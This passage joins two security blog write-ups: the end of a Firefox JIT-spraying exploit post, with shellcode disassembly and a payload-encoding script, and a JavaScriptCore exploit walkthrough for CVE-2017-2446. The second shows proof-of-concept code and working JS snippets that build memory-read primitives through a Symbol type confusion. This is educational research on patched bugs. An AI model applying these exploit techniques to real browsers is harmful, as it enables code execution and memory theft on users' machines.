00000123`c34d67d2 49bb909090909050eb09 mov r11,9EB509090909090h
00000123`c34d67dc 4c899db0ebffff  mov     qword ptr [rbp-1450h],r11
00000123`c34d67e3 49bb909090909053eb09 mov r11,9EB539090909090h
00000123`c34d67ed 4c899d00faffff  mov     qword ptr [rbp-600h],r11
00000123`c34d67f4 49bb909090909051eb09 mov r11,9EB519090909090h
00000123`c34d67fe 4c899d98fcffff  mov     qword ptr [rbp-368h],r11
00000123`c34d6805 49bb909090909052eb09 mov r11,9EB529090909090h
00000123`c34d680f 4c899d28ffffff  mov     qword ptr [rbp-0D8h],r11
00000123`c34d6816 49bb909090909055eb09 mov r11,9EB559090909090h
00000123`c34d6820 4c899d00ebffff  mov     qword ptr [rbp-1500h],r11
00000123`c34d6827 49bb909090909056eb09 mov r11,9EB569090909090h
00000123`c34d6831 4c899db0edffff  mov     qword ptr [rbp-1250h],r11
00000123`c34d6838 49bb909090909057eb09 mov r11,9EB579090909090h
00000123`c34d6842 4c899d30f6ffff  mov     qword ptr [rbp-9D0h],r11
00000123`c34d6849 49bb909090904150eb09 mov r11,9EB504190909090h
00000123`c34d6853 4c899d90f2ffff  mov     qword ptr [rbp-0D70h],r11
00000123`c34d685a 49bb909090904151eb09 mov r11,9EB514190909090h
00000123`c34d6864 4c899dd8f8ffff  mov     qword ptr [rbp-728h],r11
00000123`c34d686b 49bb909090904152eb09 mov r11,9EB524190909090h
00000123`c34d6875 4c899dc0f7ffff  mov     qword ptr [rbp-840h],r11
00000123`c34d687c 49bb909090904153eb09 mov r11,9EB534190909090h
00000123`c34d6886 4c899db0fbffff  mov     qword ptr [rbp-450h],r11
00000123`c34d688d 49bb909090904154eb09 mov r11,9EB544190909090h
00000123`c34d6897 4c899d48eeffff  mov     qword ptr [rbp-11B8h],r11
00000123`c34d689e 49bb909090904155eb09 mov r11,9EB554190909090h
00000123`c34d68a8 4c899d68fbffff  mov     qword ptr [rbp-498h],r11
00000123`c34d68af 49bb909090904156eb09 mov r11,9EB564190909090h
00000123`c34d68b9 4c899d48f4ffff  mov     qword ptr [rbp-0BB8h],r11
00000123`c34d68c0 49bb909090904157eb09 mov r11,9EB574190909090h
00000123`c34d68ca 4c895da0        mov     qword ptr [rbp-60h],r11 <- NOOOOOO
00000123`c34d68ce 49bb9090904989e3eb09 mov r11,9EBE38949909090h
00000123`c34d68d8 4c899d08eeffff  mov     qword ptr [rbp-11F8h],r11

Well, close from perfect. Even though I tried a bunch of things, I do not think I have ever ended up on a fully clean layout (ended appending about ~seventy doubles). I also do not know the reason why as this is only based off observations. But if you think about it, we can potentially tolerate a few "mistakes" if we: do not use rip addressing and we can use the NOP sled prior to the instruction to "tolerate" some of those mistakes.

For the first part of the problem, I basically inject a number of NOP instructions in between every instructions. I thought I would just throw this in ml64.exe, have it figure out the references for me and call it a day. Unfortunately there are a number of annoyances that made me move away from this solution. Here are a few I can remember from the top of my head:

  • As you have to know precisely the number of NOP to inject to simulate the "JIT environment", you also need to know the size of the instruction you want to plant. The issue is that when you are inflating the payload with NOP in between every instruction, some instructions get encoded differently. Imagine a short jump encoded on two bytes.. well it might become a long jump encoded with four bytes. And if it happens, it messes up everything.

ifrit.js
  • Sort of as a follow-up to the above point I figured I would try to force MASM64 to generate long jumps all the time instead of short jumps. Turns out, I did not find a way to do that which was annoying.
  • My initial workflow was that: I would dump the assembly with WinDbg, send it to a Python script that generates a .asm file that I would compile with ml64. Something to keep in mind is that, in x86 one instruction can have several different encodings. With different sizes. So again, I encountered issues with the same class of problem as above: ml64 would encode the disassembled instruction a bit differently and kaboom.

In the end I figured it was enough bullshit and I would just implement it myself to control my own destiny. Not something pretty, but something that works. I have a Python script that works in several passes. The input to the script is just the WinDbg disassembly of the payload I want to JITify. Every line has the address of the instruction, the encoded bytes and the disassembly.

payload = '''00007ff6`6ede1021 50              push    rax
00007ff6`6ede1022 53              push    rbx
00007ff6`6ede1023 51              push    rcx
00007ff6`6ede1024 52              push    rdx
# [...]
'''

Let's walk through payload2jit.py:

  1. First step is to normalize the textual version of the payload. Obviously, we do not want to deal with text so we extract addresses (useful for labelization), encoding (to calculate the number of NOPs to inject) and the disassembly (used for re-assembling). An example output is available here _p0.asm.
  2. Second step is labelization of our payload. We iterate through every line and we replace absolute addresses by labels. This is required so that we can have keystone re-assemble the payload and take care of references later. An example output is available in _p1.asm.
  3. At this stage, we enter the iterative process. The goal of it, is to assemble the payload an compare it to the previous iteration. If we find variance between the encoding of the same instruction, we have to re-adjust the number of NOPs injected. If the encoding is larger, we remove NOPs; if it is smaller, we add NOPs. We repeat this stage until the assembled payload converges to no change. Two generations are needed to reach stabilization for our payload: _p2.asm / _p2.bin and _p3.asm / _p3.bin.
  4. Once we have an assembled payload, we generate a JavaScript file and invoke an interpreter to have it generate the byop.js file which is full of the constants encoding our final payload.

This is what the script yields on stdout (some of the short jump instructions need a larger encoding because the payload inflates):

(C:\ProgramData\Anaconda2) c:\work\codes\blazefox\scripts>python payload2jit.py
[+] Extracted the original payload, 434 bytes (see _p0.asm)
[+] Replaced absolute references by labels (see _p1.asm)
[+] #1 Assembled payload, 2513 bytes, 2200 instructions (_p2.asm/.bin)
  > je 0x3b1 has been encoded with a larger size instr 2 VS 6
  > je 0x3b1 has been encoded with a larger size instr 2 VS 6
  > je 0x53b has been encoded with a larger size instr 2 VS 6
  > jne 0x273 has been encoded with a larger size instr 2 VS 6
  > je 0x3f7 has been encoded with a larger size instr 2 VS 6
  > je 0x3f7 has been encoded with a larger size instr 2 VS 6
  > je 0x3f7 has been encoded with a larger size instr 2 VS 6
  > je 0x816 has been encoded with a larger size instr 2 VS 6
  > jb 0x6be has been encoded with a larger size instr 2 VS 6
[+] #2 Assembled payload, 2477 bytes, 2164 instructions (_p3.asm/.bin)
[*] Generating bring_your_own_payload.js..
[*] Spawning js.exe..
[*] Outputting byop.js..

And finally, after a lot of dead ends, hacky-scripts, countless hours of debugging and a fair amount of frustration... the moment we all waited for \o/:

ifrit.js

Evaluation

This exploit turned out to be a bit more annoying that I anticipated. In the end it is nice because we just have to hijack control-flow and we get arbitrary native code execution, without ROP. Now, there are still a bunch of things I would have liked to investigate (some of them I might soon):

  • It would be cool to actually build an actual useful payload. Something that injects arbitrary JavaScript in every tab, or enable a UXSS condition of some sort. We might even be able to pull that off with just corruption of a few key structures (ala GodMode / SafeMode back then in Internet Explorer) .
  • It would also be interesting to actually test this BYOP thingy on various version of Firefox and see if it actually is reliable (and to quantify it). If it is then I would be curious to test its limits: bigger payload, better tooling for "transforming" an arbitrary payload into something that is JITable, etc.
  • Another interesting avenue would be to evaluate how annoying it is to get native code-execution without hijacking an indirect call (assuming Firefox enables some sort of software CFI solution).
  • I am also sure there are a bunch of fun tricks to be found in both the baseline JIT and IonMonkey that could be helpful to develop techniques, primitives, and utilities.
  • WebAssembly and the JIT should probably open other interesting avenues for exploitation. [edit] Well this is pretty fun because while writing finishing up the article I have just noticed the cool work of @rh0_gz that seems to have developed a very similar technique using the WASM JIT, go check it out: More on ASM.JS Payloads and Exploitation.
  • The last thing I would like to try is to play with pwn.js.

Conclusion

Hopefully you are not asleep and you made it all the way down there :). Thanks for reading and hopefully you both enjoyed the ride and learned a thing or two.

If you would like to play at home and re-create what I described above, I basically uploaded everything needed in the blazefox GitHub repository as mentioned above. No excuse to not play at home :).

I would love to hear feedback / ideas so feel free to ping me on twitter at @0vercl0k, or find me on IRC or something.

Last but not least, I would like to thank my mates yrp604 and __x86 for proofreading, edits and all the feedback :).

Bunch of useful and less useful links (some I already pasted above):

CVE-2017-2446 or JSC::JSGlobalObject::isHavingABadTime.

By: yrp
15 July 2018 at 01:49

Introduction

This post will cover the development of an exploit for JavaScriptCore (JSC) from the perspective of someone with no background in browser exploitation.

Around the start of the year, I was pretty burnt out on CTF problems and was interested in writing an exploit for something more complicated and practical. I settled on writing a WebKit exploit for a few reasons:

  • It is code that is broadly used in the real world
  • Browsers seemed like a cool target in an area I had little familiarity (both C++ and interpreter exploitation.)
  • WebKit is (supposedly) the softest of the major browser targets.
  • There were good existing resources on WebKit exploitation, namely saelo’s Phrack article, as well as a variety of public console exploits.

With this in mind, I got a recommendation for an interesting looking bug that has not previously been publicly exploited: @natashenka’s CVE-2017-2446 from the project zero bugtracker. The bug report had a PoC which crashed in memcpy() with some partially controlled registers, which is always a promising start.

This post assumes you’ve read saelo’s Phrack article linked above, particularly the portions on NaN boxing and butterflies -- I can’t do a better job of explaining these concepts than the article. Additionally, you should be able to run a browser/JavaScript engine in a debugger -- we will target Linux for this post, but the concepts should translate to your preferred platform/debugger.

Finally, the goal of doing this initially and now writing it up was and is to learn as much as possible. There is clearly a lot more for me to learn in this area, so if you read something that is incorrect, inefficient, unstable, a bad idea, or just have some thoughts to share, I’d love to hear from you.

Target Setup and Tooling

First, we need a vulnerable version of WebKit. e72e58665d57523f6792ad3479613935ecf9a5e0 is the hash of the last vulnerable version (the fix is in f7303f96833aa65a9eec5643dba39cede8d01144) so we check out and build off this.

To stay in more familiar territory, I decided to only target the jsc binary, not WebKit browser as a whole. jsc is a thin command line wrapper around libJavaScriptCore, the library WebKit uses for its JavaScript engine. This means any exploit for jsc, with some modification, should also work in WebKit. I’m not sure if this was a good idea in retrospect -- it had the benefit of resulting in a stable heap as well as reducing the amount of code I had to read and understand, but had fewer codepaths and objects available for the exploit.

I decided to target WebKit on Linux instead of macOS mainly due to debugger familiarity (gdb + gef). For code browsing, I ended up using vim and rtags, which was… okay. If you have suggestions for C++ code auditing, I’d like to hear them.

Target modifications

I found that I frequently wanted to breakpoint in my scripts to examine the interpreter state. After screwing around with this for a while I eventually just added a dbg() function to jsc. This would allow me to write code like:

dbg(); // examine the memory layout
foo(); // do something
dbg(); //see how things have changed

The patch to add dbg() to jsc is pretty straightforward.

diff --git diff --git a/Source/JavaScriptCore/jsc.cpp b/Source/JavaScriptCore/jsc.cpp
index bda9a09d0d2..d359518b9b6 100644
--- a/Source/JavaScriptCore/jsc.cpp
+++ b/Source/JavaScriptCore/jsc.cpp
@@ -994,6 +994,7 @@ static EncodedJSValue JSC_HOST_CALL functionSetHiddenValue(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionPrintStdOut(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionPrintStdErr(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionDebug(ExecState*);
+static EncodedJSValue JSC_HOST_CALL functionDbg(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionDescribe(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionDescribeArray(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionSleepSeconds(ExecState*);
@@ -1218,6 +1219,7 @@ protected:

         addFunction(vm, "debug", functionDebug, 1);
         addFunction(vm, "describe", functionDescribe, 1);
+        addFunction(vm, "dbg", functionDbg, 0);
         addFunction(vm, "describeArray", functionDescribeArray, 1);
         addFunction(vm, "print", functionPrintStdOut, 1);
         addFunction(vm, "printErr", functionPrintStdErr, 1);
@@ -1752,6 +1754,13 @@ EncodedJSValue JSC_HOST_CALL functionDebug(ExecState* exec)
     return JSValue::encode(jsUndefined());
 }

+EncodedJSValue JSC_HOST_CALL functionDbg(ExecState* exec)
+{
+       asm("int3;");
+
+       return JSValue::encode(jsUndefined());
+}
+
 EncodedJSValue JSC_HOST_CALL functionDescribe(ExecState* exec)
 {
     if (exec->argumentCount() < 1)

Other useful jsc features

Two helpful functions added to the interpreter by jsc are describe() and describeArray(). As these functions would not be present in an actual target interpreter, they are not fair game for use in an exploit, however are very useful when debugging:

>>> a = [0x41, 0x42];
65,66
>>> describe(a);
Object: 0x7fc5663b01f0 with butterfly 0x7fc5663caec8 (0x7fc5663eac20:[Array, {}, ArrayWithInt32, Proto:0x7fc5663e4140, Leaf]), ID: 88
>>> describeArray(a);
<Butterfly: 0x7fc5663caec8; public length: 2; vector length: 3>

Symbols

Release builds of WebKit don’t have asserts enabled, but they also don’t have symbols. Since we want symbols, we will build with CFLAGS=-g CXXFLAGS=-g Scripts/Tools/build-webkit --jsc-only

The symbol information can take quite some time to parse by the debugger. We can reduce the load time of the debugger significantly by running gdb-add-index on both jsc and libJavaScriptCore.so.

Dumping Object Layouts

WebKit ships with a script for macOS to dump the object layout of various classes, for example, here is JSC::JSString:

x@webkit:~/WebKit/Tools/Scripts$ ./dump-class-layout JSC JSString
Found 1 types matching "JSString" in "/home/x/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so"
  +0 { 24} JSString
  +0 {  8}     JSC::JSCell
  +0 {  1}         JSC::HeapCell
  +0 <  4>         JSC::StructureID m_structureID;
  +4 <  1>         JSC::IndexingType m_indexingTypeAndMisc;
  +5 <  1>         JSC::JSType m_type;
  +6 <  1>         JSC::TypeInfo::InlineTypeFlags m_flags;
  +7 <  1>         JSC::CellState m_cellState;
  +8 <  4>     unsigned int m_flags;
 +12 <  4>     unsigned int m_length;
 +16 <  8>     WTF::String m_value;
 +16 <  8>         WTF::RefPtr<WTF::StringImpl> m_impl;
 +16 <  8>             WTF::StringImpl * m_ptr;
Total byte size: 24
Total pad bytes: 0

This script required minor modifications to run on linux, but it was quite useful later on.

Bug

With our target built and tooling set up, let’s dig into the bug a bit. JavaScript (apparently) has a feature to get the caller of a function:

var q;

function f() {
    q = f.caller;
}

function g() {
    f();
}

g(); // ‘q’ is now equal to ‘g’

This behavior is disabled under certain conditions, notably if the JavaScript code is running in strict mode. The specific bug here is that if you called from a strict function to a non-strict function, JSC would allow you to get a reference to the strict function. From the PoC provided you can see how this is a problem:

var q;
// this is a non-strict chunk of code, so getting the caller is allowed
function g(){
    q = g.caller;
    return 7;
}

var a = [1, 2, 3];
a.length = 4;
// when anything, including the runtime, accesses a[3], g will be called
Object.defineProperty(Array.prototype, "3", {get : g});
// trigger the runtime access of a[3]
[4, 5, 6].concat(a);
// q now is a reference to an internal runtime function
q(0x77777777, 0x77777777, 0); // crash

In this case, the concat code is in Source/JavaScriptCore/builtins/ArrayPrototype.js and is marked as ‘use strict’.

This behavior is not always exploitable: we need a JS runtime function ‘a’ which performs sanitization on arguments, then calls another runtime function ‘b’ which can be coerced into executing user supplied JavaScript to get a function reference to ‘b’. This will allow you to do b(0x41, 0x42), skipping the sanitization on your inputs which ‘a’ would normally perform.

The JSC runtime is a combination of JavaScript and C++ which kind of looks like this:

+-------------+
| User Code   | <- user-provided code
+-------------+
| JS Runtime  | <- JS that ships with the browser as part of the runtime
+-------------+
| Cpp Runtime | <- C++ that implements the rest of the runtime
+-------------+

The Array.concat above is a good example of this pattern: when concat() is called it first goes into ArrayPrototype.js to perform sanitization on the argument, then calls into one of the concat implementations. The fastpath implementations are generally written in C++, while the slowpaths are either pure JS, or a different C++ implementation.

What makes this bug useful is the reference to the function we get (‘q’ in the above snippet) is after the input sanitization performed by the JavaScript layer, meaning we have a direct reference to the native function.

The provided PoC is an especially powerful example of this, however there are others -- some useful, some worthless. In terms of a general plan, we’ll need to use this bug to create an infoleak to defeat ASLR, then figure out a way to use it to hijack control flow and get a shell out of it.

Infoleak

Defeating ASLR is the first order of business. To do this, we need to understand the reference we have in the concat code.

concat in more detail

Tracing the codepath from our concat call, we start in Source/JavaScriptCore/builtins/ArrayPrototype.js:

function concat(first)
{
    "use strict";

    // [1] perform some input validation
    if (@argumentCount() === 1
        && @isJSArray(this)
        && this.@isConcatSpreadableSymbol === @undefined
        && (!@isObject(first) || first.@isConcatSpreadableSymbol === @undefined)) {

        let result = @concatMemcpy(this, first); // [2] call the fastpath
        if (result !== null)
            return result;
    }

    // … snip ...

In this code snippet the @ is the interpreter glue which tells the JavaScript engine to look in the C++ bindings for the specified symbol. These functions are only callable via the JavaScript runtime which ships with Webkit, not user code. If you follow this through some indirection, you will find @concatMemcpy corresponds to arrayProtoPrivateFuncAppendMemcpy in Source/JavaScriptCore/runtime/ArrayPrototype.cpp:

EncodedJSValue JSC_HOST_CALL arrayProtoPrivateFuncAppendMemcpy(ExecState* exec)
{
    ASSERT(exec->argumentCount() == 3);

    VM& vm = exec->vm();
    JSArray* resultArray = jsCast<JSArray*>(exec->uncheckedArgument(0));
    JSArray* otherArray = jsCast<JSArray*>(exec->uncheckedArgument(1));
    JSValue startValue = exec->uncheckedArgument(2);
    ASSERT(startValue.isAnyInt() && startValue.asAnyInt() >= 0 && startValue.asAnyInt() <= std::numeric_limits<unsigned>::max());
    unsigned startIndex = static_cast<unsigned>(startValue.asAnyInt());
    if (!resultArray->appendMemcpy(exec, vm, startIndex, otherArray)) // [3] fastpath...
    // … snip ...
}

Which finally calls into appendMemcpy in JSArray.cpp:

bool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)
{
    // … snip ...

    unsigned otherLength = otherArray->length();
    unsigned newLength = startIndex + otherLength;
    if (newLength >= MIN_SPARSE_ARRAY_INDEX)
        return false;

    if (!ensureLength(vm, newLength)) { // [4] check dst size
        throwOutOfMemoryError(exec, scope);
        return false;
    }
    ASSERT(copyType == indexingType());

    if (type == ArrayWithDouble)
        memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);
    else
        memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength); // [5] do the concat

    return true;
}

This may seem like a lot of code, but given Arrays src and dst, it boils down to this:

# JS Array.concat
def concat(dst, src):
    if typeof(dst) == Array and typeof(src) == Array: concatFastPath(dst, src)
    else: concatSlowPath(dst, src)

# C++ concatMemcpy / arrayProtoPrivateFuncAppendMemcpy
def concatFastPath(dst, src):
    appendMemcpy(dst, src)

# C++ appendMemcpy
def appendMemcpy(dst, src):
    if allocated_size(dst) < sizeof(dst) + sizeof(src):
        resize(dst)

    memcpy(dst + sizeof(dst), src, sizeof(src));

However, thanks to our bug we can skip the type validation at [1] and call arrayProtoPrivateFuncAppendMemcpy directly with non-Array arguments! This turns the logic bug into a type confusion and opens up some exploitation possibilities.

JSObject layouts

To understand the bug a bit better, let’s look at the layout of JSArray:

x@webkit:~/WebKit/Tools/Scripts$ ./dump-class-layout JSC JSArray
Found 1 types matching "JSArray" in "/home/x/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so"
  +0 { 16} JSArray
  +0 { 16}     JSC::JSNonFinalObject
  +0 { 16}         JSC::JSObject
  +0 {  8}             JSC::JSCell
  +0 {  1}                 JSC::HeapCell
  +0 <  4>                 JSC::StructureID m_structureID;
  +4 <  1>                 JSC::IndexingType m_indexingTypeAndMisc;
  +5 <  1>                 JSC::JSType m_type;
  +6 <  1>                 JSC::TypeInfo::InlineTypeFlags m_flags;
  +7 <  1>                 JSC::CellState m_cellState;
  +8 <  8>             JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly;
  +8 <  8>                 JSC::Butterfly * m_value;
Total byte size: 16
Total pad bytes: 0

The memcpy we’re triggering uses butterfly()->contiguous().data() + startIndex as a dst, and while this may initially look complicated, most of this compiles away. butterfly() is a butterfly, as detailed in saelo’s Phrack article. This means the contiguous().data() portion effectively disappears. startIndex is fully controlled as well, so we can make this 0. As a result, our memcpy reduces to: memcpy(qword ptr [obj + 8], qword ptr [src + 8], sizeof(src)). To exploit this we simply need an object which has a non-butterfly pointer at offset +8.

This turns out to not be simple. Most objects I could find inherited from JSObject, meaning they inherited the butterfly pointer field at +8. In some cases (e.g. ArrayBuffer) this value was simply NULL’d, while in others I wound up type confusing a butterfly with another butterfly, to no effect. JSStrings were particularly frustrating, as the relevant portions of their layout were:

+8    flags  : u32
+12   length : u32

The length field was controllable via user code, however flags were not. This gave me the primitive that I could control the top 32bit of a pointer, and while this might have been doable with some heap spray, I elected to Find a Better Bug(™).

Salvation Through Symbols

My basic process at this point was to look at MDN for the types I could instantiate from the interpreter. Most of these were either boxed (integers, bools, etc), Objects, or Strings. However, Symbol was a JS primitive had a potentially useful layout:

x@webkit:~/WebKit/Tools/Scripts$ ./dump-class-layout JSC Symbol
Found 1 types matching "Symbol" in "/home/x/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so"
  +0 { 16} Symbol
  +0 {  8}     JSC::JSCell
  +0 {  1}         JSC::HeapCell
  +0 <  4>         JSC::StructureID m_structureID;
  +4 <  1>         JSC::IndexingType m_indexingTypeAndMisc;
  +5 <  1>         JSC::JSType m_type;
  +6 <  1>         JSC::TypeInfo::InlineTypeFlags m_flags;
  +7 <  1>         JSC::CellState m_cellState;
  +8 <  8>     JSC::PrivateName m_privateName;
  +8 <  8>         WTF::Ref<WTF::SymbolImpl> m_uid;
  +8 <  8>             WTF::SymbolImpl * m_ptr;
Total byte size: 16
Total pad bytes: 0

At +8 we have a pointer to a non-butterfly! Additionally, this object passes all the checks on the above code path, leading to a potentially controlled memcpy on top of the SymbolImpl. Now we just need a way to turn this into an infoleak...

Diagrams

WTF::SymbolImpl’s layout:

x@webkit:~/WebKit/Tools/Scripts$ ./dump-class-layout WTF SymbolImpl
Found 1 types matching "SymbolImpl" in "/home/x/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so"
  +0 { 48} SymbolImpl
  +0 { 24}     WTF::UniquedStringImpl
  +0 { 24}         WTF::StringImpl
  +0 <  4>             unsigned int m_refCount;
  +4 <  4>             unsigned int m_length;
  +8 <  8>             WTF::StringImpl::(anonymous union) None;
 +16 <  4>             unsigned int m_hashAndFlags;
 +20 <  4>             <PADDING>
 +20 <  4>         <PADDING>
 +20 <  4>     <PADDING>
 +24 <  8>     WTF::StringImpl * m_owner;
 +32 <  8>     WTF::SymbolRegistry * m_symbolRegistry;
 +40 <  4>     unsigned int m_hashForSymbol;
 +44 <  4>     unsigned int m_flags;
Total byte size: 48
Total pad bytes: 12
Padding percentage: 25.00 %

The codepath we’re on expects a butterfly with memory layout simplified to the following:

       -8   -4     +0  +8  +16
+---------------------+---+-----------+
|pub length|length| 0 | 1 | 2 |...| n |
+---------------------+---+-----------+
                  ^
+-------------+   |
|butterfly ptr+---+
+-------------+

However, we’re providing it with something like this:

                    +0       +4     +8
+-----------------------------------------------+
|       OOB        |refcount|length|str base ptr|
+-----------------------------------------------+
                   ^
+--------------+   |
|SymbolImpl ptr+---+
+--------------+

If we recall our earlier pseudocode:

def appendMemcpy(dst, src):
    if allocated_size(dst) < sizeof(dst) + sizeof(src):
        resize(dst)

    memcpy(dst + sizeof(dst), src, sizeof(src));

In the normal butterfly case, it will check the length and public length fields, located at -4 and -8 from the butterfly pointer (i.e btrfly[-1] and btrfly[-2] respectively). However, when passing Symbols in our typed confused cases those array accesses will be out of bounds, and thus potentially controllable. Let’s walk through the two possibilities.

OOB memory is a large value

Let’s presume we have a memory layout similar to:

  OOB    OOB
+------------------------------------------+
|0xffff|0xffff|refcount|length|str base ptr|
+------------------------------------------+
              ^
        +---+ |
        |ptr+-+
        +---+

The exact OOB values won’t matter, as long as they’re greater than the size of the dst plus the src. In this case, resize in our pseudocode or ensureLength ([4]) in the actual code will not trigger a reallocation and object move, resulting in a direct memcpy on top of refcount and length. From here, we can turn this into a relative read infoleak by overwriting the length field.

For example, if we store a function reference to arrayProtoPrivateFuncAppendMemcpy in a variable named busted_concat and then trigger the bug, like this:

let x = Symbol("AAAA");

let y = [];
y.push(new Int64('0x000042420000ffff').asDouble());

busted_concat(x, y, 0);

Note: Int64 can be found here and is, of course, covered in saelo’s Phrack article.

We would then end up with a Symbol x with fields:

 refcount length
+----------------------------+
| 0x4242 |0xffff|str base ptr|
+----------------------------+

str base ptr will point to AAAA, however instead of having a length of 4, it will have a length of 0xffff. To access this memory, we can extract the String from a Symbol with:

let leak = x.toString().charCodeAt(0x1234);

toString() in this case is actually kind of complicated under the hood. My understanding is that all strings in JSC are “roped”, meaning any existing substrings are linked together with pointers as opposed to linearly laid out in memory. However this detail doesn’t really affect us, for our purposes a string is created out of our controlled length and the existing string base pointer, with no terminating characters to be concerned with. It is possible to crash here if we were to index outside of mapped memory, but this hasn’t happened in my experience. As an additional minor complication, strings come in two varieties, 8bit and UTF-16. We can easily work around this with a basic heuristic: if we read any values larger than 255 we just assume it is a UTF-16 string.

None of this changes the outcome of the snippet above, leak now contains the contents of OOB memory. Boom, relative memory read :)

OOB Memory is a zero

On the other hand, let’s assume the OOB memory immediately before our target SymbolImpl is all zeros. In this case, resize / ensureLength will trigger a reallocation and object move. ensureLength more or less corresponds to the following pseudocode:

if sizeof(this.butterfly) + sizeof(other.butterfly) > self.sz:
    new_btrfly =  alloc(sizeof(this.butterfly) + sizeof(other.butterfly));
    memcpy(new_btrfly, this.butterfly, sizeof(this.butterfly));
    this.butterfly = new_btrfly;

Or in words: if the existing butterfly isn’t large enough to hold a combination of the two butterflies, allocate a larger one, copy the existing butterfly contents into it, and assign it. Note that this does not actually do the concatenation, it just makes sure the destination will be large enough when the concatenation is actually performed.

This turns out to also be quite useful to us, especially if we already have the relative read above. Assuming we have a SymbolImpl starting at address 0x4008 with a memory layout of:

          OOB    OOB
        +------------------------------------------+
0x4000: |0x0000|0x0000|refcount|length|str base ptr|
        +------------------------------------------+
                      ^
                +---+ |
                |ptr+-+
                +---+

And, similar to the large value case above, we trigger the bug:

let read_target = '0xdeadbeef';

let x = Symbol("AAAA");

let y = [];
y.push(new Int64('0x000042420000ffff').asDouble());
y.push(new Int64(read_target).asDouble());

busted_concat(x, y, 0);

We end up with a “SymbolImpl” at a new address, 0x8000:

         refcount length str base ptr
        +----------------------------+
0x8000: | 0x4242 |0xffff| 0xdeadbeef |
        +----------------------------+

In this case, we’ve managed to conjure a complete SymbolImpl! We might not need to allocate a backing string for this Symbol (i.e. “AAAA”), but doing so can make it slightly easier to debug. The ensureLength code basically decided to “resize” our SymbolImpl, and by doing so allowed us to fully control the contents of a new one. This now means that if we do

let leak = x.toString().charCodeAt(0x5555);

We will be dereferencing *(0xdeadbeef + 0x5555), giving us a completely arbitrary memory read. Obviously this depends on a relative leak, otherwise we wouldn’t have a valid mapped address to target. Additionally, we could have overwritten the str base pointer in the non-zero length case (because the memcpy is based on the sizeof the source), but I found this method to be slightly more stable and repeatable.

With this done we now have both relative and arbitrary infoleaks :)

Notes on fastMalloc

We will get into more detail on this in a second, however I want to cover how we control the first bytes prior the SymbolImpl, as being able to control which ensureLength codepath we hit is important (we need to get the relative leak before the absolute). This is partially where targeting jsc instead of Webkit proper made my life easier: I had more or less deterministic heap layout for all of my runs, specifically:

// this symbol will always pass the ensureLength check
let x = Symbol('AAAA');

function y() {
    // this symbol will always fail the ensureLength check
    let z = Symbol('BBBB');
}

To be honest, I didn’t find the root cause for why this was the case; I just ran with it. SymbolImpl objects here are allocated via fastMalloc, which seems to be used primarily by the JIT, SymbolImpl, and StringImpl. Additionally (and unfortunately) fastMalloc is used by print(), meaning if we were interested in porting our exploit from jsc to WebKit we would likely have to redo most of the heap offsets (in addition to spraying to get control over the ensureLength codepath).

While this approach is untested, something like

let x = 'AAAA'.blink();

Will cause AAAA to be allocated inline with the allocation metadata via fastMalloc, as long as your target string is short enough. By spraying a few blink’d objects to fill in any holes, it should be possible to to control ensureLength and get the relative infoleak to make the absolute infoleak.

Arbitrary Write

Let’s recap where we are, where we’re trying to go, and what’s left to do:

We can now read and leak arbitrary browser memory. We have a promising looking primitive for a memory write (the memcpy in the case where we do not resize). If we can turn that relative memory write into an arbitrary write we can move on to targeting some vtables or saved program counters on the stack, and hijack control flow to win.

How hard could this be?

Failure: NaN boxing

One of the first ideas I had to get an arbitrary write was passing it a numeric value as the dst. Our busted_concat can be simplified to a weird version of memcpy(), and instead of passing it memcpy(Symbol, Array, size) could we pass it something like memcpy(0x41414141, Array, size)? We would need to create an object at the address we passed in, but that shouldn’t be too difficult at this point: we have a good infoleak and the ability to instantiate memory with arbitrary values via ArrayWithDouble. Essentially, this is asking if we can use this function reference to get us a fakeobj() like primitive. There are basically two possibilities to try, and neither of them work.

First, let’s take the integer case. If we pass 0x41414141 as the dst parameter, this will be encoded into a JSValue of 0xffff000041414141. That’s a non-canonical address, and even if it weren’t, it would be in kernel space. Due to this integer tagging, it is impossible to get a JSValue that is an integer which is also a valid mapped memory address, so the integer path is out.

Second, let’s examine what happens if we pass it a double instead: memcpy(new Int64(0x41414141).asDouble(), Array, size). In this case, the double should be using all 64 bits of the address, so it might be possible to construct a double who’s representation is a mapped memory location. However, JavaScriptCore handles this case as well: they use a floating point representation which has 0x0001000000000000 added to the value when expressed as a JSValue. This means, like integers, doubles can never correspond to a useful memory address.

For more information on this, check out this comment in JSCJSValue.h which explains the value tagging in more detail.

Failure: Smashing fastMalloc

In creating our relative read infoleak, we only overwrote the refcount and length fields of the target SymbolImpl. However, this memcpy should be significantly more useful to us: because the size of the copy is related to the size of the source, we can overwrite up to the OOB size field. Practically, this turns into an arbitrary overwrite of SymbolImpls.

As mentioned previously, SymbolImpl get allocated via fastMalloc. To figure this out, we need to leave JSC and check out the Web Template Framework or WTF. WTF, for lack of a better analogy, forms a kind of stdlib for JSC to be built on top of it. If we look up WTF::SymbolImpl from our class dump above, we find it in Source/WTF/wtf/text/SymbolImpl.h. Specifically, following the class declarations that are of interest to us:

class SymbolImpl : public UniquedStringImpl {

Source/WTF/wtf/text/UniquedStringImpl.h

class UniquedStringImpl : public StringImpl {

/Source/WTF/wtf/text/StringImpl.h

class StringImpl {
    WTF_MAKE_NONCOPYABLE(StringImpl); WTF_MAKE_FAST_ALLOCATED;

WTF_MAKE_FAST_ALLOCATED is a macro which expands to cause objects of this type to be allocated via fastMalloc. This help forms our target list: anything that is tagged with WTF_MAKE_FAST_ALLOCATED, or allocated directly via fastMalloc is suitable, as long as we can force an allocation from the interpreter.

